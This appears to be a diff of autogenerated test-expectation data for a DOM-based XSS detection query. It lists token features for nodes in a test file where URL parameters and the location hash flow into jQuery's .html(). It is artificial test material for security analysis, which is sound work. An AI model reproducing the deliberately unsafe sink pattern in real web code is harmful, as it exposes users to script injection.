autogenerated/Xss/DomBasedXss/tst.js:335:3:335:11 | exceptional return of $('name') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:16 | $('name').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:16 | $('name').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:16 | $('name').html | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:16 | $('name').html | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:16 | $('name').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:35 | $('name ... name')) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:35 | $('name ... name')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:35 | $('name ... name')) | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:35 | $('name ... name')) | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:35 | $('name ... name')) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:35 | exceptional return of $('name ... name')) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:35 | exceptional return of $('name ... name')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:35 | exceptional return of $('name ... name')) | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:35 | exceptional return of $('name ... name')) | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:35 | exceptional return of $('name ... name')) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:335:5:335:10 | 'name' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:335:5:335:10 | 'name' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:335:5:335:10 | 'name' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17269,6 +119978,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:335:5:335:10 | 'name' | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | | autogenerated/Xss/DomBasedXss/tst.js:335:5:335:10 | 'name' | enclosingFunctionName | URLPseudoProperties | | autogenerated/Xss/DomBasedXss/tst.js:335:5:335:10 | 'name' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:335:13:335:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:335:13:335:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:335:13:335:16 | html | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:335:13:335:16 | html | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:335:13:335:16 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:335:18:335:22 | myUrl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:335:18:335:22 | myUrl | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:335:18:335:22 | myUrl | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:335:18:335:22 | myUrl | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:335:18:335:22 | myUrl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:335:18:335:26 | myUrl.get | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:335:18:335:26 | myUrl.get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:335:18:335:26 | myUrl.get | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:335:18:335:26 | myUrl.get | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:335:18:335:26 | myUrl.get | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:335:18:335:34 | exceptional return of myUrl.get('name') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:335:18:335:34 | exceptional return of myUrl.get('name') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:335:18:335:34 | exceptional return of myUrl.get('name') | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:335:18:335:34 | exceptional return of myUrl.get('name') | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:335:18:335:34 | exceptional return of myUrl.get('name') | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:335:18:335:34 | myUrl.get('name') | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:335:18:335:34 | myUrl.get('name') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:335:18:335:34 | myUrl.get('name') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17276,6 +120005,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:335:18:335:34 | myUrl.get('name') | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | | autogenerated/Xss/DomBasedXss/tst.js:335:18:335:34 | myUrl.get('name') | enclosingFunctionName | URLPseudoProperties | | autogenerated/Xss/DomBasedXss/tst.js:335:18:335:34 | myUrl.get('name') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:335:24:335:26 | get | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:335:24:335:26 | get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:335:24:335:26 | get | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:335:24:335:26 | get | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:335:24:335:26 | get | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:335:28:335:33 | 'name' | CalleeFlexibleAccessPath | myUrl.get | | autogenerated/Xss/DomBasedXss/tst.js:335:28:335:33 | 'name' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:335:28:335:33 | 'name' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17284,6 +120018,144 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:335:28:335:33 | 'name' | enclosingFunctionName | URLPseudoProperties | | autogenerated/Xss/DomBasedXss/tst.js:335:28:335:33 | 'name' | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:335:28:335:33 | 'name' | receiverName | myUrl | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:339:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:339:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:339:0 | this | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:339:0 | this | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:339:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:345:1 | 'arguments' object of function hash | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:345:1 | 'arguments' object of function hash | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:345:1 | 'arguments' object of function hash | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:345:1 | 'arguments' object of function hash | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:345:1 | 'arguments' object of function hash | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:345:1 | exceptional return of function hash | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:345:1 | exceptional return of function hash | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:345:1 | exceptional return of function hash | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:345:1 | exceptional return of function hash | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:345:1 | exceptional return of function hash | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:345:1 | functio ... T OK\\n\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:345:1 | functio ... T OK\\n\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:345:1 | functio ... T OK\\n\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:345:1 | return of function hash | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:345:1 | return of function hash | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:345:1 | return of function hash | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:345:1 | return of function hash | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:339:1:345:1 | return of function hash | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:339:10:339:13 | hash | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:339:10:339:13 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:339:10:339:13 | hash | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:340:2 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:340:2 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:340:2 | this | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:340:2 | this | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:340:2 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | 'arguments' object of function getUrl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | 'arguments' object of function getUrl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | 'arguments' object of function getUrl | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | 'arguments' object of function getUrl | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | 'arguments' object of function getUrl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | exceptional return of function getUrl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | exceptional return of function getUrl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | exceptional return of function getUrl | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | exceptional return of function getUrl | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | exceptional return of function getUrl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | functio ... n);\\n } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | functio ... n);\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | functio ... n);\\n } | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | functio ... n);\\n } | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | functio ... n);\\n } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | return of function getUrl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | return of function getUrl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | return of function getUrl | enclosingFunctionBody | getUrl URL document location $ getUrl hash substring 1 | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | return of function getUrl | enclosingFunctionName | hash | +| autogenerated/Xss/DomBasedXss/tst.js:340:3:342:3 | return of function getUrl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:340:12:340:17 | getUrl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:340:12:340:17 | getUrl | contextFunctionInterfaces | 